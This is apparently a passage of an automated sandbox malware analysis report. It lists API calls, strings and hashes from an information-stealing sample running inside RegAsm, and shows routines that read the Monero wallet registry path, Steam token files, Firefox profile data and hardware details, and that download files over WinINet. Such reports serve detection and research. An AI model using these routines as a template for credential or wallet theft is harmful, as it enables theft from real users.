                                                                                • Instruction ID: 0083d2e72e9c4a3b74dda565e39e4a0bb24369a5d23a76fc935ba894ca840aa9
                                                                                • Opcode Fuzzy Hash: 345aea7090713525bc43328569ab8dfd80e6ef4a38db32126cd76269f1d4eab7
                                                                                • Instruction Fuzzy Hash: 17210EB0900189EADB14FFA5C556BDDBBF4AF18308F50417EE80563682DB785B0CCB66
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                • String ID: 2IA
                                                                                • API String ID: 3183270410-4174278054
                                                                                • Opcode ID: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                • Instruction ID: 8552e384592846dc61b773d54a0908cfb1ecd9fdbc452b9aa5e823a114c6ff4c
                                                                                • Opcode Fuzzy Hash: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                • Instruction Fuzzy Hash: 85F03079905228BBEB60AB90DC49FDD3B78AB09715F000061BE85A61D0DBB4AAC4CBD4
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00413460: _EH_prolog.MSVCRT ref: 00413465
                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                • CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2678630583-0
                                                                                • Opcode ID: 1cb46bc23d17f687b51e131ae5113430bc73b21f4a29ab7455bec2179b617caf
                                                                                • Instruction ID: ec526774ace028d9da9643eeb35cca1a79bf063c44aba5694452f09cb0374c28
                                                                                • Opcode Fuzzy Hash: 1cb46bc23d17f687b51e131ae5113430bc73b21f4a29ab7455bec2179b617caf
                                                                                • Instruction Fuzzy Hash: 23310D75900148AFCB11DFA4C995ADEBBB8FF18304F50412EF906A7281DB789A88CB95
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3676486918-0
                                                                                • Opcode ID: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                • Instruction ID: 832c21bd40a73018163515ce5beef45c93da2aa0da3d8997035a91abaf75a422
                                                                                • Opcode Fuzzy Hash: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                • Instruction Fuzzy Hash: E2F03A79240208FFEB119F91DC0AFAE7B7AEB45B40F104025FB01AA1A0D7B19A109B24
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4), ref: 0040FE2C
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4,00000000,?), ref: 0040FE33
                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3676486918-0
                                                                                • Opcode ID: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                • Instruction ID: c6a06fe1a5752460b6d2ee94bc9516a9de2a98ba0b24791e6944b9a77995073e
                                                                                • Opcode Fuzzy Hash: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                • Instruction Fuzzy Hash: 11F05E7A240214FFFB209BD1DD0EFAA7A7EEB45B04F101035FB01A61A1D7B05900DB64
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6%@$6%@
                                                                                • API String ID: 0-3369382886
                                                                                • Opcode ID: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                • Instruction ID: badd9bf96c2c88f43ed760c6ea304aae97d5f1f2e5982ea7d2ae84e0ed7fb19c
                                                                                • Opcode Fuzzy Hash: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                • Instruction Fuzzy Hash: 9C4146716001199FCB01CF69D8806EDBBB1FF89318F1484BADC55EB395C3B8A982CB54
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041453D
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,004265B3), ref: 0041458E
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                • Soft\Steam\steam_tokens.txt, xrefs: 004145A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                • String ID: Soft\Steam\steam_tokens.txt
                                                                                • API String ID: 40794102-3507145866
                                                                                • Opcode ID: 7a5fed3ba98e7f09c9eff5b3c220e42c9313fc81122d0b4050e547e22e5d9ad4
                                                                                • Instruction ID: 67ec4c1d792d67a99180fbd14363f38a75f30ae372fc1f04672944380735093a
                                                                                • Opcode Fuzzy Hash: 7a5fed3ba98e7f09c9eff5b3c220e42c9313fc81122d0b4050e547e22e5d9ad4
                                                                                • Instruction Fuzzy Hash: D8214971C00188AACB14FBE5C956BDDBB78AF18308F50817EE401725D2DB78274CCA66
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004165DE
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                • lstrcat.KERNEL32(?), ref: 0041663F
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                                  • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                  • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426908), ref: 00416308
                                                                                  • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042690C), ref: 00416322
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                                  • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042657D), ref: 00416357
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                                  • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426924), ref: 004163D9
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426928), ref: 004163FB
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                                  • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                  • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prologwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                • String ID:
                                                                                • API String ID: 25485560-0
                                                                                APIs
                                                                                • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C7B3095
                                                                                  • Part of subcall function 6C7B35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C83F688,00001000), ref: 6C7B35D5
                                                                                  • Part of subcall function 6C7B35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7B35E0
                                                                                  • Part of subcall function 6C7B35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C7B35FD
                                                                                  • Part of subcall function 6C7B35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C7B363F
                                                                                  • Part of subcall function 6C7B35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C7B369F
                                                                                  • Part of subcall function 6C7B35A0: __aulldiv.LIBCMT ref: 6C7B36E4
                                                                                • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7B309F
                                                                                  • Part of subcall function 6C7D5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7D56EE,?,00000001), ref: 6C7D5B85
                                                                                  • Part of subcall function 6C7D5B50: EnterCriticalSection.KERNEL32(6C83F688,?,?,?,6C7D56EE,?,00000001), ref: 6C7D5B90
                                                                                  • Part of subcall function 6C7D5B50: LeaveCriticalSection.KERNEL32(6C83F688,?,?,?,6C7D56EE,?,00000001), ref: 6C7D5BD8
                                                                                  • Part of subcall function 6C7D5B50: GetTickCount64.KERNEL32 ref: 6C7D5BE4
                                                                                • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C7B30BE
                                                                                  • Part of subcall function 6C7B30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C7B3127
                                                                                  • Part of subcall function 6C7B30F0: __aulldiv.LIBCMT ref: 6C7B3140
                                                                                  • Part of subcall function 6C7EAB2A: __onexit.LIBCMT ref: 6C7EAB30
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                • String ID:
                                                                                • API String ID: 4291168024-0
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00411EBD
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
                                                                                  • Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                                  • Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                                  • Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                                  • Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                                  • Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                                  • Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                                  • Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                                  • Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                                  • Part of subcall function 00404DCA: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
                                                                                • String ID: B
                                                                                • API String ID: 1244342732-1255198513
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040B8B4
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040B463: _EH_prolog.MSVCRT ref: 0040B468
                                                                                  • Part of subcall function 0040B463: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B4E7
                                                                                  • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B50B
                                                                                  • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B525
                                                                                  • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B5C1
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$lstrcat$FileFindFirstFolderPathlstrlen
                                                                                • String ID: \..\
                                                                                • API String ID: 271224408-4220915743
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (@
                                                                                • API String ID: 0-1346038526
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405E98), ref: 00405DE8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-3916222277
                                                                                • Opcode ID: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                • Instruction ID: ced7d7a04c1373fcb48adb74aa7fd2d2290691d2abba1c02f51b3daadd827661
                                                                                • Opcode Fuzzy Hash: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                • Instruction Fuzzy Hash: A7113A71515A0AEBEF20CF94C9887ABB7F5FF04340F6084279541E62C0D7789A85EFA9
                                                                                APIs
                                                                                • SHFileOperationA.SHELL32(?), ref: 00411289
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FileOperation
                                                                                • String ID: ^qA
                                                                                • API String ID: 3080627654-2929517337
                                                                                • Opcode ID: b86a9cf137741d795d42c8fdc09233bf8a42cfbe6d8886dfb6df5f219da20288
                                                                                • Instruction ID: cea7c5b2f21ce40cf92ecfc9ca7a06bfbd61282a3af7cf5c5322f6d4fd748434
                                                                                • Opcode Fuzzy Hash: b86a9cf137741d795d42c8fdc09233bf8a42cfbe6d8886dfb6df5f219da20288
                                                                                • Instruction Fuzzy Hash: BAE0E5B0E0021D9FCB44EFA4E5456EEBBF4FF08308F40806AC509F7240E3B452458BA9
                                                                                APIs
                                                                                • GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CurrentProfile
                                                                                • String ID: Unknown
                                                                                • API String ID: 2104809126-1654365787
                                                                                • Opcode ID: 5e10422413539b42bf5c0f3fa128b12628a931a4afcc5f0832f78eb075a7ee3b
                                                                                • Instruction ID: 3d2c3ff73f9fd288211faec72780458d1f3465e1919466c86557ea86080fd633
                                                                                • Opcode Fuzzy Hash: 5e10422413539b42bf5c0f3fa128b12628a931a4afcc5f0832f78eb075a7ee3b
                                                                                • Instruction Fuzzy Hash: 49E01270A0010DFBDB10DBA4DA85FDE77BC6B04348F508525EA45D3181DBB8E649DBA9
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00410CE2
                                                                                • GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                Similarity
                                                                                • API ID: AttributesFileH_prolog
                                                                                • String ID:
                                                                                • API String ID: 3244726999-0
                                                                                • Opcode ID: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                                • Instruction ID: 23f90a50d93cb2e1358a652bfa6555910aea1ee46ff196ae4cba0ec79dbf811d
                                                                                • Opcode Fuzzy Hash: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                                • Instruction Fuzzy Hash: BEE09B305005149BC714AFA4E4016CDB720EF05764F10422EE866A25D5C7385B45C684
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405AB2
                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405ADE
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                • Instruction ID: 0100467e13e99263edfc9c933cb68e83bd3c9ecc7dabaf0022702558aaebf942
                                                                                • Opcode Fuzzy Hash: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                • Instruction Fuzzy Hash: 2521AE71700B059BDB24CFB4CC81BABB7F5EB44314F24492AE61AD72D0D278AD408F18
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                  • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                • String ID:
                                                                                • API String ID: 2625060131-0
                                                                                • Opcode ID: 56088f79004cf497bad3f02a7e5291dcc555a9d03921c7f1e9fa0e27b921b9e5
                                                                                • Instruction ID: 500d7c88a2085726728d35326e6952772f3e0e38a46ae67bbb90ee8c45411e9d
                                                                                • Opcode Fuzzy Hash: 56088f79004cf497bad3f02a7e5291dcc555a9d03921c7f1e9fa0e27b921b9e5
                                                                                • Instruction Fuzzy Hash: 53915EB1D0024CEADF15EBE5D952BDEBBB8AF18308F50417EE40573282DA78570C8B66
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040A898
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00409F72: _EH_prolog.MSVCRT ref: 00409F77
                                                                                  • Part of subcall function 00409F72: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425C06,00000000,-00000020,00000000), ref: 00409FF6
                                                                                Similarity
                                                                                • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                • String ID:
                                                                                • API String ID: 1592259726-0
                                                                                • Opcode ID: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                                • Instruction ID: 11f6703c6529ff65c6027a0a45f3fdb3f97caadc550874a50ef78dc79f4eaafe
                                                                                • Opcode Fuzzy Hash: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                                • Instruction Fuzzy Hash: F62171B1900249EBDF20FFA9C9067DDBFB4AF45314F00416EE88963281D7795708CBA6
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00401EDB
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00401162: _EH_prolog.MSVCRT ref: 00401167
                                                                                  • Part of subcall function 00401162: FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                Similarity
                                                                                • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                • String ID:
                                                                                • API String ID: 1592259726-0
                                                                                • Opcode ID: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                                • Instruction ID: 28e08b363bcf4c13626f635e6ad0a869a568ad08ab8b3845b1d26a2f95c805ed
                                                                                • Opcode Fuzzy Hash: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                                • Instruction Fuzzy Hash: 4A215071D00249ABDF20FB69C94679DBFB4AF44714F00452EE89873282DB395749CBD6
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00415A3F
                                                                                  • Part of subcall function 00412D62: _EH_prolog.MSVCRT ref: 00412D67
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
